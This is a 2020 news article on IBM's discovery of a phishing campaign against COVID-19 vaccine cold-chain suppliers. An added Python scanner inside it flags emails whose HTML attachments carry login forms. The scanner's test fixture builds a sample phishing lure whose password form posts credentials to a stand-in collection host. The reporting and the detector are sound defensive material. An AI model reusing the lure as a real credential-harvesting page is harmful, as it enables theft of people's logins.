IBM researchers have detected a global phishing campaign targeting organizations associated with an overseas supply chain used for vaccine distribution.
The company said spoofed emails impersonating a Chinese biomedical executive targeted organizations in six countries, including Germany, Italy, South Korea, the Czech Republic and Taiwan.
The organizations, which included a European Commission office, are believed to be “providers of material support to meet transportation needs within the COVID-19 cold chain,” the analysts wrote in a post to be published Thursday.
Vaccines, including those under review for COVID-19, must be kept cool and sometimes frozen during distribution, and the Chinese company whose executive was impersonated is a supplier of low-temperature equipment.
“We assess that the purpose of this COVID-19 phishing campaign may have been to harvest credentials, possibly to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution,” the analysts, Melissa Frydrych and Claire Zaboeva, wrote.
Frydrych and Zaboeva said they could not determine if the campaign was successful or who was behind it but said the “precision targeting of executives and key global organizations hold the potential hallmarks of nation-state tradecraft.”
Which country would have an interest in disrupting the transportation of COVID-19 vaccine to poorer nations was not clear. The cold-chain suppliers could simply be a tempting target for state-backed criminal cyber groups looking to make money by selling stolen data, or the motive could be a more nefarious desire to disrupt what will be a vital part of ending the pandemic across much of the globe.
IBM said it notified US authorities about its findings, and that federal cybersecurity officials are encouraging companies involved in distributing vaccines in the United States to be on guard.
Operation Warp Speed distributing vaccines in United States
In the United States, development and distribution of COVID-19 vaccines is being overseen by health and military officials involved in Operation Warp Speed. The operation is relying on a proprietary software program called Tiberius and a “‘whole of government’ approach to ensure the security of the vaccine supply chain, including delivery to administration points,” officials have said.
The makers of two vaccines have applied for emergency use authorization from the FDA in the United States. One made by Moderna can be stored at regular refrigerator temperatures for 30 days and can be held at room temperature for up to 12 hours. But the vaccine from Pfizer and German collaborator BioNTech must be stored at between minus 112 degrees and minus 94 degrees Fahrenheit, requiring ultracold cooling equipment during shipping and distribution.
The organizations targeted in the overseas phishing campaign are believed to be affiliated with Gavi, an international vaccine alliance dedicated to inoculating children in the poorest countries. The alliance works with UNICEF, the World Health Organization, the World Bank and others.
The IBM researchers said the organizations that received the spoofed emails are in the energy, manufacturing, website creation, software and internet security industries. They are believed to be involved with a project known as the Cold Chain Equipment Optimization Platform, a $400 million effort to upgrade low-temperature supply chains in 56 countries.
The emails posed as requests for price quotes and carried HTML attachments that, when opened, prompted recipients to enter their credentials before the document could be viewed.
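The lure described above, an HTML file that renders a login form in the recipient's browser, is something a mail gateway can flag before anyone opens it. The scanner below is an added example, not code from IBM X-Force or from the article; it uses only the Python standard library, and the two sample messages it builds (sender and recipient addresses, subject lines, file names and the collection URL) are constructed for illustration, not taken from the campaign.

```python
"""Flag e-mails whose HTML attachments ask the reader to log in.

Added example, not code from IBM X-Force or the article. Standard library
only. The sample messages, addresses, file names and the collection URL
below are constructed for illustration.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Indicators of a credential-harvesting HTML attachment: a password field,
# a form that posts to an absolute (remote) URL, or embedded script.
PASSWORD_INPUT = re.compile(r"<input\b[^>]*\btype\s*=\s*['\"]?password", re.I)
FORM_ACTION = re.compile(r"<form\b[^>]*\baction\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)
SCRIPT_TAG = re.compile(r"<script\b", re.I)


def scan_message(raw: bytes) -> list:
    """Return one finding per HTML attachment in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        filename = (part.get_filename() or "").lower()
        # Catch both a declared text/html part and a generic part named *.html.
        if part.get_content_type() != "text/html" and not filename.endswith((".html", ".htm")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. application/octet-stream named .html
            body = body.decode("utf-8", "replace")
        findings.append({
            "filename": filename,
            "password_form": bool(PASSWORD_INPUT.search(body)),
            "post_targets": FORM_ACTION.findall(body),
            "has_script": bool(SCRIPT_TAG.search(body)),
        })
    return findings


def is_credential_lure(raw: bytes) -> bool:
    """True when any HTML attachment carries a password field or posts to a remote URL."""
    return any(f["password_form"] or f["post_targets"] for f in scan_message(raw))


def build_sample_lure() -> bytes:
    """Constructed RFQ-themed lure: the attachment renders a login form."""
    msg = EmailMessage()
    msg["From"] = "procurement@supplier.example"   # invented sender
    msg["To"] = "sales@coldchain.example"          # invented recipient
    msg["Subject"] = "Request for quotation - cold chain equipment"
    msg.set_content("Please open the attached RFQ and reply with pricing.")
    html = ("<html><body><p>Sign in to view the protected document.</p>"
            "<form method='post' action='https://collector.example/login'>"
            "<input type='email' name='user'><input type='password' name='pass'>"
            "<input type='submit' value='View'></form></body></html>")
    msg.add_attachment(html, subtype="html", filename="RFQ_2020.html")
    return msg.as_bytes()


def build_sample_benign() -> bytes:
    """Constructed control: an HTML attachment with no form and no script."""
    msg = EmailMessage()
    msg["From"] = "newsletter@coldchain.example"
    msg["To"] = "sales@coldchain.example"
    msg["Subject"] = "Monthly shipping update"
    msg.set_content("Summary attached.")
    msg.add_attachment("<html><body><h1>Shipping update</h1><p>No issues this month.</p></body></html>",
                       subtype="html", filename="update.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for label, builder in (("lure", build_sample_lure), ("benign", build_sample_benign)):
        raw = builder()
        print(label, "->", "FLAGGED" if is_credential_lure(raw) else "clean", scan_message(raw))
```

Matching on a password field rather than on a file extension alone keeps legitimate HTML reports from being quarantined, and the `post_targets` list gives responders the collection endpoint to block and hunt for in proxy logs.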
“The CCEOP initiative is naturally accelerating efforts to facilitate the distribution of a COVID-19 vaccine. A breach within any part of this global alliance could result in the exposure of numerous partner computing environments worldwide,” the IBM researchers warn.
IBM has a cyber threat detection division that earlier this year uncovered activity targeting a global supply chain of personal protective gear.
In October, federal officials warned that ransomware attacks had targeted U.S. hospitals and urged healthcare providers to “ensure that they take timely and reasonable precautions to protect their networks from these threats.”
(c) 2020 USA Today
Distributed by Tribune Content Agency, LLC